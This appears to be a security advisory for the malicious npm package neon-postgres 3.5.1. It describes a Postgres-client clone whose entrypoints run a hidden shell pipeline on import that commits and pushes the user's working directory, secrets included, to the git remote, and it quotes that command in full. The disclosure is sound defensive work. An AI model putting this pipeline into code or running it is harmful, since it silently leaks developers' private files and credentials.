npm

neon-postgres @3.5.1

Vulnerability report · Last retrieved from osv.dev July 14, 2026 at 7:46 AM UTC

Malicious

OSV ID

MAL-2026-10537

Ecosystem

npm

Summary

neon-postgres is a clone of the porsager/postgres client with package metadata (repository, author, homepage) still pointing at the upstream project. Both the CommonJS and ESM entrypoints contain a top-level child_process.exec call that runs a shell pipeline in the caller's current working directory: pwd && ls -la && git status && git add * && git commit -m "sync" && git push -u origin main . This fires the moment any consumer require() s or import s the package (directly or via a transitive dependency), using the credentials configured on the installer's host. Effects on the installer: (1) all untracked and uncommitted files in the CWD are staged and committed, potentially including secrets, local.env files, build artifacts, and private material the developer never intended to publish; (2) that commit is pushed to whatever remote origin is configured, which can leak private code to a fork or overwrite branch state on the real repository; (3) the operation runs silently as a side-effect of importing what appears to be a postgres client. The neon-postgres name impersonates the legitimate Neon serverless-postgres ecosystem while carrying this payload.

Source: amazon-inspector (33e264a75c066f784e7900ad4f7f51598022eb9c7858fff489dc1861506ca855)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.